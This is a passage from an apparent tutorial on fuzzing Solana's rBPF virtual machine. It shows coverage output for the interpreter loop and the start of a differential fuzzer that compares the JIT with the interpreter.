#1452095	NEW    cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4840 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452830	DONE   cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4826 rss: 358Mb
Done 1452830 runs in 301 second(s)

Notice that the number of inputs tried (the leftmost number) is nearly half that of the dumb fuzzer, but our cov and ft values are significantly higher.

Let’s evaluate that coverage a little more specifically:

$ cargo +nightly fuzz coverage smart
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/smart -instr-profile=fuzz/coverage/smart/coverage.profdata -show-line-counts-or-regions -show-instantiations -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    886|    fn execute_program_interpreted_inner(
  710|    886|        &mut self,
  711|    886|        instruction_meter: &mut I,
  712|    886|        initial_insn_count: u64,
  713|    886|        last_insn_count: &mut u64,
  714|    886|    ) -> ProgramResult<E> {
  715|    886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    886|        reg[1] = ebpf::MM_INPUT_START;
  718|    886|
  719|    886|        // Loop on instructions
  720|    886|        let config = self.executable.get_config();
  721|    886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    886|        let mut remaining_insn_count = initial_insn_count;
  723|  2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|  2.16M|            *last_insn_count += 1;
  725|  2.16M|            let pc = next_pc;
  726|  2.16M|            next_pc += 1;
  727|  2.16M|            let mut instruction_width = 1;
  728|  2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|  2.16M|            let dst = insn.dst as usize;
  730|  2.16M|            let src = insn.src as usize;
  731|  2.16M|
  732|  2.16M|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|  2.16M|            }
  738|       |
  739|  2.16M|            match insn.opc {
  740|  2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|      6|                    match insn.opc {
  742|      2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|      4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  757|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  762|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  767|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  772|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^1
  777|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  782|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  787|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      6|                ebpf::LD_DW_IMM  => {
  796|      6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      6|                    instruction_width = 2;
  798|      6|                    next_pc += 1;
  799|      6|                    reg[dst] = insn.imm as u64;
  800|      6|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     21|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^4
  806|      4|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|      4|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  811|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|     26|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^19
  816|     19|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|      5|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  821|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^1
  828|      1|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     11|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^6
  833|      6|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^6
  838|      6|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     16|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^2
  850|      2|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^2
  860|      2|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|    136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|     18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|     94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|     14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|    226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|     15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|     98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|      0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|      0|                    }
  886|      0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|      0|                    if reg[src] as i32 == 0 {
  890|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|      0|                    }
  892|      0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|      0|                    }
  895|      0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    102|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|     13|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|     46|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|     16|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      4|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|     32|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      2|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|      4|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|     54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|     90|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|     20|                    if reg[src] as u32 == 0 {
  909|      6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|     14|                    }
  911|     14|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|     96|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|     14|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|     59|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|      7|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|     15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|    236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      2|                ebpf::LE         => {
  920|      2|                    reg[dst] = match insn.imm {
  921|      1|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      1|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      2|                ebpf::BE         => {
  930|      2|                    reg[dst] = match insn.imm {
  931|      1|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      1|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|  16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|     26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|    145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|     25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|    480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|     13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|    191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|      5|                    if reg[src] == 0 {
  950|      3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|      2|                    }
  952|      2|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|      0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|      0|                    }
  958|      0|
  959|      0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|      0|                    if reg[src] == 0 {
  963|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      0|                    }
  965|      0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      0|                    }
  968|      0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    115|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|     19|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|     93|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|     19|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|     19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|     48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|      5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|     94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|    141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|     19|                    if reg[src] == 0 {
  982|      4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|     15|                    }
  984|     15|                                    reg[dst] %= reg[src];
  985|       |                },
  986|     98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|     17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|     89|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|     10|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|     14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|   327k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|    116|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^76                                                           ^40
  996|   131k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^11
  997|   163k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^16.4k
  998|   131k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^34
  999|  65.5k|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^8
 1000|  65.5k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^11
 1001|  65.5k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^3
 1002|      6|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^4                                                            ^2
 1003|   131k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1004|  65.5k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^2
 1005|      3|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^2
 1006|      2|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|   196k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^196k                                                         ^3
 1008|   131k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^3
 1009|  65.5k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^6
 1010|     14|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^13
 1011|  65.5k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^12
 1012|  65.5k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1013|   131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^20
 1014|   147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^23
 1015|  65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1016|   131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     17|                    let mut resolved = false;
 1032|     17|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     17|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     17|                    if syscalls {
 1039|      6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      6|                        }
 1062|     11|                    }
 1063|       |
 1064|     17|                    if calls {
 1065|     11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     11|                        }
 1073|      6|                    }
 1074|       |
 1075|     17|                    if !resolved {
 1076|     17|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     11|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     39|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     39|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|  2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|     33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|  2.16M|            }
 1106|       |        }
 1107|       |
 1108|    683|        Err(EbpfError::ExecutionOverrun(
 1109|    683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    683|        ))
 1111|    886|    }

Now we see that jump and call instructions are actually exercised, and that the body of the interpreter loop executes significantly more often despite roughly the same number of successful calls to the interpreter function. From this, we can infer not only that more programs execute successfully, but also that those which do tend to execute more valid instructions overall.

While this isn’t hitting every branch, it’s now hitting significantly more – and with much more interesting values.

The development of this version of the fuzzer took about an hour, so we’re at a total of one hour of development.

JIT and differential fuzzing

Now that we have a fuzzer which can generate lots of inputs that are actually interesting to us, we can develop a fuzzer which can test both JIT and the interpreter against each other. But how do we even test them against each other?

Picking inputs, outputs, and configuration

As the definition of pseudo-oracle says, we need to check whether the alternate program (for JIT, the interpreter, and vice versa), when provided with the same “input”, produces the same “output”. So what inputs and outputs do we have?

For inputs, there are three notable things we’ll want to vary:

  • The config which determines how the VM should execute (what features and such)
  • The BPF program to be executed, which we’ll generate like we do in “smart”
  • The initial memory of the VMs

Once we’ve developed our inputs, we’ll also need to think of our outputs:

  • The “return state”, the exit code itself or the error state
  • The number of instructions executed (e.g., did the JIT program overrun?)
  • The final memory of the VMs

Then, to execute both JIT and the interpreter, we’ll take the following steps:

  • The same steps as the first fuzzers:
    • Use the rBPF verification pass (called “check”) to make sure that the VM will accept the input program
    • Initialise the memory, the syscalls, and the entrypoint
    • Create the executable data
  • Then prepare to perform the differential testing
    • JIT compile the BPF code (if it fails, fail quietly)
    • Initialise the interpreted VM
    • Initialise the JIT VM
    • Execute both the interpreted and JIT VMs
    • Compare return state, instructions executed, and final memory, and panic if any do not match.

Writing the fuzzer

As before, I’ve split this up into more manageable chunks so you can read each piece on its own before seeing how it fits into the final fuzzer.

Step 1: Defining our inputs
#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    ... snip ...
    prog: FuzzProgram,
    mem: Vec<u8>,
}
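The ConfigTemplate type lives in the snipped common module, so here is a minimal sketch of what such a template might look like for readers of this excerpt; the variant names and field selection are my own assumptions, but the Config flags themselves (enable_instruction_tracing, dynamic_stack_frames) appear in the interpreter listing above.

// Hypothetical sketch of a fuzzable config template; not the actual common.rs.
use solana_rbpf::vm::Config;

#[derive(arbitrary::Arbitrary, Debug)]
enum ConfigTemplate {
    Default,
    WithTracing,
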